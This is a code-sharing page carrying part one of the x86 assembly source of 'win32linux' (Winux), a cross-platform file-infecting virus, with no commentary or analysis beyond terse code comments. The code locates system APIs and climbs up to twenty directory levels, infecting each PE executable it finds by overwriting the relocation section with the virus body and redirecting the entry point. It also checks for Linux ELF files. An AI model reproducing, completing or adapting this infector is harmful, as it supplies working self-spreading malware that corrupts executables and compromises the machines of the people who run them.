📄 win32linux.winux源码part 1 .txt
字号:
.386p
.model flat
include win32api.inc
include useful.inc
include mz.inc
include pe.inc
.data
db ?
.code
Start: pushad
@SEH_SetupFrame <jmp end_host> ;setup SEH frame
call gdelta
gdelta: pop ebp ;ebp=delta offset
call get_base ;get K32 base address
call get_apis ;find addresses of APIz
lea eax,[ebp + prev_dir - gdelta]
push eax
push MAX_PATH
call [ebp + a_GetCurrentDirectoryA - gdelta]
;get current directory
push 20
pop ecx ;20 passes in directory tree
f_infect:
push ecx
;direct action - infect all PE filez in directory
lea esi,[ebp + WFD - gdelta] ;WIN32_FIND_DATA structure
push esi ;save its address
@pushsz '*.*' ;search for all filez
call [ebp + a_FindFirstFileA - gdelta] ;find first file
inc eax
je e_find ;quit if not found
dec eax
push eax ;save search handle to stack
f_next: call wCheckInfect ;infect found file
push esi ;save WFD structure
push dword ptr [esp+4] ;and search handle from stack
call [ebp + a_FindNextFileA - gdelta];find next file
test eax,eax
jne f_next ;and infect it
f_close:call [ebp + a_FindClose - gdelta] ;close search handle
e_find: @pushsz '..'
mov esi,[ebp + a_SetCurrentDirectoryA - gdelta]
call esi ;go upper in directory tree
pop ecx
loop f_infect ;and again..
lea eax,[ebp + prev_dir - gdelta]
push eax
call esi ;go back to original directory
end_host:
@SEH_RemoveFrame ;remove SEH frame
popad
extrn ExitProcess
mov eax,offset ExitProcess-400000h
original_ep = dword ptr $-4
add eax,400000h
image_base = dword ptr $-4
jmp eax ;and go back to host program
;INFECT FILE (Win32 version)
wCheckInfect Proc
pushad
@SEH_SetupFrame <jmp end_seh> ;setup SEH frame
and dword ptr [ebp + sucElf - gdelta],0
test [esi.WFD_dwFileAttributes], FILE_ATTRIBUTE_DIRECTORY
jne end_seh ;discard directory entries
xor ecx,ecx
cmp [esi.WFD_nFileSizeHigh],ecx
jne end_seh ;discard files >4GB
mov eax,[esi.WFD_nFileSizeLow]
cmp eax,4000h
jb end_seh ;discard small filez
mov [ebp + l_lseek - gdelta],eax
xor eax,eax
push eax
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push eax
push eax
push GENERIC_READ or GENERIC_WRITE
lea eax,[esi.WFD_szFileName]
push eax
call [ebp + a_CreateFileA - gdelta] ;open file
inc eax
je end_seh
dec eax
mov [ebp + hFile - gdelta],eax
cdq
push edx
push edx
push edx
push PAGE_READWRITE
push edx
push eax
call [ebp + a_CreateFileMappingA - gdelta]
cdq
xchg eax,ecx
jecxz end_cfma
mov [ebp + hMapFile - gdelta],ecx
push edx
push edx
push edx
push FILE_MAP_WRITE
push ecx ;map file to address space
call [ebp + a_MapViewOfFile - gdelta]
xchg eax,ecx
jecxz end_mvof
mov [ebp + lpFile - gdelta],ecx
jmp n_fileopen
close_file:
push 12345678h
lpFile = dword ptr $-4 ;unmap file
call [ebp + a_UnmapViewOfFile - gdelta]
end_mvof:
push 12345678h
hMapFile = dword ptr $-4
call [ebp + a_CloseHandle - gdelta]
end_cfma:
mov ecx,12345678h ;was it linux program (ELF)?
sucElf = dword ptr $-4
jecxz c_close ;no, close that file
push 2
push 0
push 0
push dword ptr [ebp + hFile - gdelta]
call [ebp + a_SetFilePointer - gdelta]
;go to EOF
push 0
lea eax,[ebp + sucElf - gdelta]
push eax
push virtual_end-Start
push 12345678h
a_mem = dword ptr $-4
push dword ptr [ebp + hFile - gdelta]
call [ebp + a_WriteFile - gdelta]
;write there orig. program part
push MEM_RELEASE
push 0
push dword ptr [ebp + a_mem - gdelta]
call [ebp + a_VirtualFree - gdelta]
;and deallocate used memory
c_close:push 12345678h
hFile = dword ptr $-4
call [ebp + a_CloseHandle - gdelta] ;close file
jmp end_seh ;and quit
n_fileopen:
call check_elf
je wInfectELF ;is it Linux program (ELF)?
add ax,-IMAGE_DOS_SIGNATURE
jne close_file
call check_pe
jne close_file ;is it Win32 program (PE)?
;important chex
cmp word ptr [esi.NT_FileHeader.FH_Machine],IMAGE_FILE_MACHINE_I386
jne close_file
mov ax,[esi.NT_FileHeader.FH_Characteristics]
test ax,IMAGE_FILE_EXECUTABLE_IMAGE
je close_file
test ax,IMAGE_FILE_DLL
jne close_file
test ax,IMAGE_FILE_SYSTEM
jne close_file
mov al,byte ptr [esi.NT_FileHeader.OH_Subsystem]
test al,IMAGE_SUBSYSTEM_NATIVE
jne close_file
movzx eax,word ptr [esi.NT_FileHeader.FH_NumberOfSections]
dec eax
test eax,eax
je close_file
call header&relocs ;get PE headerz and check for relocs
je close_file ;quit if no relocs
mov ebx,[edi.SH_VirtualAddress]
cmp eax,ebx
jne close_file
cmp [edi.SH_SizeOfRawData],virus_end-Start+500
jb close_file ;is it large enough?
pushad
xor eax,eax
mov edi,edx
stosd
stosd
popad ;erase relocs record
call set_alignz ;align section variable
push dword ptr [ebp + original_ep - gdelta]
push dword ptr [ebp + image_base - gdelta]
;save used variablez
mov eax,[esi.NT_OptionalHeader.OH_AddressOfEntryPoint]
mov [esi.NT_OptionalHeader.OH_AddressOfEntryPoint],ebx
mov [ebp + original_ep - gdelta],eax
mov eax,[esi.NT_OptionalHeader.OH_ImageBase]
mov [ebp + image_base - gdelta],eax
;set variablez
pushad
mov edi,[edi.SH_PointerToRawData]
add edi,[ebp + lpFile - gdelta]
lea esi,[ebp + Start - gdelta]
mov ecx,virus_end-Start
rep movsb ;overwrite relocs by virus body
popad
pop dword ptr [ebp + image_base - gdelta]
pop dword ptr [ebp + original_ep - gdelta]
;restore used variablez
or dword ptr [edi.SH_Characteristics],IMAGE_SCN_MEM_WRITE
jmp close_file ;set flag and quit
wCheckInfect EndP
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -